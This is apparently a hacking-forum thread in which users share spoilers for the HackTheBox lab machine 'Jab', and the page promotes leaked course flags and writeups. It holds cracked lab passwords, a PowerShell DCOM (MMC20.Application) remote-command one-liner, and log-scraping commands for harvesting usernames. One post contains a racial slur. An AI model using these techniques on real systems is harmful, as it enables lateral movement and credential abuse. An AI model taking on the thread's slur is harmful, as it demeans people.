HTB - Jab
by paven - Saturday February 24, 2024 at 04:18 PM
#21
With the search list, you will find the hash of jmontgomery -> Midnight_121

the pentest2003 room will give you the svc_openfire pass: !@#$%^&*(1qazxsw

and you can use this user to have RCE with dcom

[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","10.129.3.13")).Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c ping x.x.x.x",0)
Reply
#22
(Feb 25, 2024, 01:23 AM)jahman Wrote: With the search list, you will find the hash of jmontgomery ->  Midnight_121

the pentest2003 room will give you the svc_openfire pass: !@#$%^&*(1qazxsw

and you can use this user to have RCE with dcom

[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","10.129.3.13")).Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c ping x.x.x.x",0)

how did you find the hash of jmontgomery? can u explain to me [activator] line?
Reply
#23
(Feb 25, 2024, 01:23 AM)jahman Wrote: With the search list, you will find the hash of jmontgomery ->  Midnight_121

Which was the mode for the hashcat? I've tried 18200, but it did work. Also I changed 18 -> 23.
Reply
#24
(Feb 25, 2024, 01:37 AM)EtR Wrote:
(Feb 25, 2024, 01:23 AM)jahman Wrote: With the search list, you will find the hash of jmontgomery ->  Midnight_121

Which was the mode for the hashcat? I've tried 18200, but it did work. Also I changed 18 -> 23.

how did u get the hash?
Reply
#25
can you please explain about the pidgin
what information did you put in the user port and server
and than how did you get a message back with the hash
Reply
#26
(Feb 25, 2024, 02:12 AM)0xfd9aac Wrote:
(Feb 25, 2024, 02:09 AM)andlommy Wrote: 2 outstanding questions

1) jmontgomery isn't in default username in seclists (jmontgomery77 is, but that doesn't help)
which userslist did you guys use?

2) how did you get to run the RCE from a linux box, it knowns nothing about dcom

You need to get list of users from search.jab.com. In pidgin it's Accounts -> <Your account> -> Search for Users...

nigga how did u export that massive user list from pidgin?
Reply
#27
svc_openfire was ezpz, where is the RCE?
Reply
#28
(Feb 25, 2024, 02:17 AM)wfuuuuuufaz Wrote:
(Feb 25, 2024, 02:12 AM)0xfd9aac Wrote:
(Feb 25, 2024, 02:09 AM)andlommy Wrote: 2 outstanding questions

1) jmontgomery isn't in default username in seclists (jmontgomery77 is, but that doesn't help)
which userslist did you guys use?

2) how did you get to run the RCE from a linux box, it knowns nothing about dcom

You need to get list of users from search.jab.com. In pidgin it's Accounts -> <Your account> -> Search for Users...

nigga how did u export that massive user list from pidgin?
I used https://xmpp.org/extensions/xep-0055.xml and copy and pasted the results to regexr and then used regex to isolate the usernames and copy pasted that
Reply
#29
so where is this rce? dcomexec isn't working with svc_openfire
Reply
#30
(Feb 25, 2024, 02:28 AM)ConnorDev Wrote:
(Feb 25, 2024, 02:20 AM)skyfallizhard Wrote:
(Feb 25, 2024, 02:17 AM)wfuuuuuufaz Wrote:
(Feb 25, 2024, 02:12 AM)0xfd9aac Wrote:
(Feb 25, 2024, 02:09 AM)andlommy Wrote: 2 outstanding questions

1) jmontgomery isn't in default username in seclists (jmontgomery77 is, but that doesn't help)
which userslist did you guys use?

2) how did you get to run the RCE from a linux box, it knowns nothing about dcom

You need to get list of users from search.jab.com. In pidgin it's Accounts -> <Your account> -> Search for Users...

nigga how did u export that massive user list from pidgin?
I used https://xmpp.org/extensions/xep-0055.xml and copy and pasted the results to regexr and then used regex to isolate the usernames and copy pasted that

You can also run:

sudo pidgin -d > output.log

Now you navigate to users, search for them, and close de program.

Next, filter names like this:

grep -oP '<value>\K[^<]+@jab.htb(?=</value>)' output.log | sed 's/@jab.htb//g' | sort | uniq > output_filtered.lst

Another alternative:
use the XMPP Console Plugin -> Perform user search -> Copy XML -> Parse XML since it's orderly
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 72 2,164 6 minutes ago
Last Post: coolguyaroundyou
  [FREE] HackTheBox Academy - CAPE Path Study Techtom 43 4,214 53 minutes ago
Last Post: codexUltron
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 24 2,740 56 minutes ago
Last Post: codexUltron
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 603 92,362 8 hours ago
Last Post: 0xnany
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 374 93,325 8 hours ago
Last Post: 0xnany

Forum Jump:


 Users browsing this forum: 1 Guest(s)